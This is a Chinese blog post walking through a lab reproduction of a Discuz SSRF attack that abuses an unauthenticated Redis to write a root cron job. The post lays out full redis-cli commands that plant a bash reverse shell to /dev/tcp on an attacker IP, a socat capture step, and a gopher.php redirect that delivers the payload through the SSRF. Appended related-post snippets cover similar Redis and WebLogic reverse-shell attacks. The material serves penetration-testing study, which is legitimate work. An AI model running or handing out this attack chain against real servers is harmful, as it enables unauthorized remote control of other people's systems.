Discuz-ssrf利用计划任务反弹shell

最新推荐文章于 2023-08-16 19:04:26 发布
最新推荐文章于 2023-08-16 19:04:26 发布
阅读量297 收藏 1
点赞数 1
分类专栏: web 渗透 web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45983744/article/details/103575399
版权

QQ交流群:811401950

#001 环境搭建:
Centos7(安装有apache,php,mysql,redis)

  • 利用winscp把discuz的源码拖到var/www/html目录下:

  • chmod -R 777 upload/ 改一下权限

  • 然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写
    在这里插入图片描述

  • 但是查看权限是有的
    在这里插入图片描述

  • 经过各种尝试无果,开始了漫长的百度之旅,皇天不负有心人,我看到了一位兄弟和我有类似的悲惨经历,以下是他的心声:
    在这里插入图片描述

  • 我赶紧打开我的centos7敲了一波:setenforce 0
    在这里插入图片描述

  • 再次打开浏览器访问192.168.136.133/upload目录,全部正常了:
    在这里插入图片描述

  • 根据提示点击下一步,终于看到了熟悉的面孔
    在这里插入图片描述

  • 访问一波正常,到此环境搭建完成
    在这里插入图片描述
    #002 漏洞复现操作:

  • 本地操作利用计划任务反弹shell
    复现环境:win7(装有nc),centos7-discuz+redis

  • Win7开启nc监听:
    在这里插入图片描述

  • Centos7首先开启redis服务:
    在这里插入图片描述

  • 操作redis写计划任务反弹shell,在redis-cli中输入以下命令:
    ◆set x “\n* * * * * /bin/bash -i > /dev/tcp/192.168.136.132/6666 0<&1 2>&1\n”
    ◆config set dir /var/spool/cron/
    ◆config set dbfilename root
    ◆save
    在这里插入图片描述

  • 回到win7中查看结果,成功接收到反弹的shell:
    在这里插入图片描述

  • 执行以下命令 /usr/sbin/ifconfig,本地利用计划任务反弹shell就成功了
    在这里插入图片描述
    #004 公网服务器利用gopher协议来写计划任务:
    ◆ redis-cli -h $1 -p $2 flushall //可不写
    ◆echo -e “\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.136.132/3333 0>&1\n\n\n”|redis-cli -h $1 -p $2 -x set 1
    ◆ redis-cli -h $1 -p $2 config set dir /var/spool/cron/
    ◆redis-cli -h $1 -p $2 config set dbfilename root
    ◆redis-cli -h $1 -p $2 save
    ◆redis-cli -h $1 -p $2 quit

  • win7用nc开启监听,bash命令执行shell/sh,看到ok代表执行成功
    在这里插入图片描述

  • 回到win7查看返回结果,成功接收到反弹的shell
    在这里插入图片描述

  • 我们想要抓取redis攻击tcp的数据包,可以使用socat端口转发。

  • Socat命令进行端口转发,把本地6379转发到2222端口,监听2222端口,抓取tcp数据包:
    ◆socat -v tcp-listen:2222,fork tcp-connect:localhost:6379
    在这里插入图片描述
    ◆bash命令执行shell.sh脚本,并且带上127.0.0.1 2222
    在这里插入图片描述
    ◆可以看到成功抓取到了tcp数据包,然后将抓取到的内容复制,并保存为1.log
    在这里插入图片描述
    ◆利用redis_ssrf.py脚本转换1.log,生成payload
    在这里插入图片描述
    ◆将生成的payload放入公网的文件gopher.php中

<?php header("Location:gopher://127.0.0.1:6379/_payload"); ?>

在这里插入图片描述
◆Win7开启nc监听6666端口,然后discuz访问payload就会反弹shell
在这里插入图片描述
在这里插入图片描述

**QQ交流群:811401950**
小小秋叶
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6485
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
ubuntu的任务计划反弹shell
最新发布
m0_65540912的博客
06-30 328
在实现的过程中,发现ubuntu靶机没有nc,无法用nc命令执行反弹的命令,而且执行计划任务的用户是什么,反弹过去的用户是一样的。
dedis&weblogic ssrf利用redis未授权反弹shell
Feng_Blue_的博客
10-27 421
本文仅提供于学术探讨,如有后果自行承担。 redis数据库未授权访问漏洞复现 启用漏洞环境 借助工具来进行操作 查看基本帮助 weblogic ssrf利用redis未授权访问反弹shell
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
mars-ssrf:SSRFDedektörü
03-04
火星 SSRFDedektörü
exchange-ssrf-rce:交换服务
03-15
用法 python3 .\exchange-exp.py 使用方式: python PoC.py <target> ...[*] Getting ComputerName and DomainName [+] domain : xxx-xxxx | [+] computer : xxx.xxx-xxxx.xxx | [*] Getting LegacyDN ...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
开发技术-硬件-SSRF前端挡光元件设计中的若干力学问题研究.zip
04-09
SSRF是一种利用服务器发起请求的安全漏洞,通常针对的是服务器可以访问但外部网络无法直接访问的内部资源。在这个特定的场景中,"挡光元件"可能是指一种物理防护措施,用于防止恶意的SSRF攻击对硬件设备造成物理损害...
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 3017
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务反弹shell,往kali弹。
浅谈SSRF 加redis反弹shell
god_Zeo的安全博客
03-22 2853
0x00 SSRF简介和原理 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如,通过控制前台的请求远程地址加载的响应,来让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务,来造成对内...
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3386
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5689
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
linux定时计划反弹shell
niqiu320的博客
05-26 2342
crontab crontab命令常见于Unix和Linux的操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。 安装(默认自带crontab) yum -y install vixie-cron yum -y install crontabs 说明: vixie-cron 软件包
redis 未授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1331
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。然后直接本地开个nc。
服务管理|反弹shell|计划任务|救援启动级别
过期的秋刀鱼
08-16 189
systemd是linux系统第一个运行的进程,用来创建系统的守护进程来管理整个linux系统。systemd取代init的一个优势就是他集合了丰富的功能,同时支持并行启动守护进程,使用起来方便。可以理解为systemd初始化整个系统所需的资源。systemd这个服务管理的后续服务,都是有配置⽂件的。修改完后关机重启,会发现系统不能正常启动,自动关机。开机以后让服务器,以字符界⾯显⽰。周期性计划任务配置⽂件。临时修改grub引导菜单。修改启动级别为图形界面。
weblogic ssrf 反弹shell
09-16
### 回答1: ...总之,利用WebLogic SSRF漏洞反弹shell是一种非法行为,违反了计算机系统的安全和隐私。我们强烈建议所有用户和管理员采取适当的安全措施来保护WebLogic服务器免受此类漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值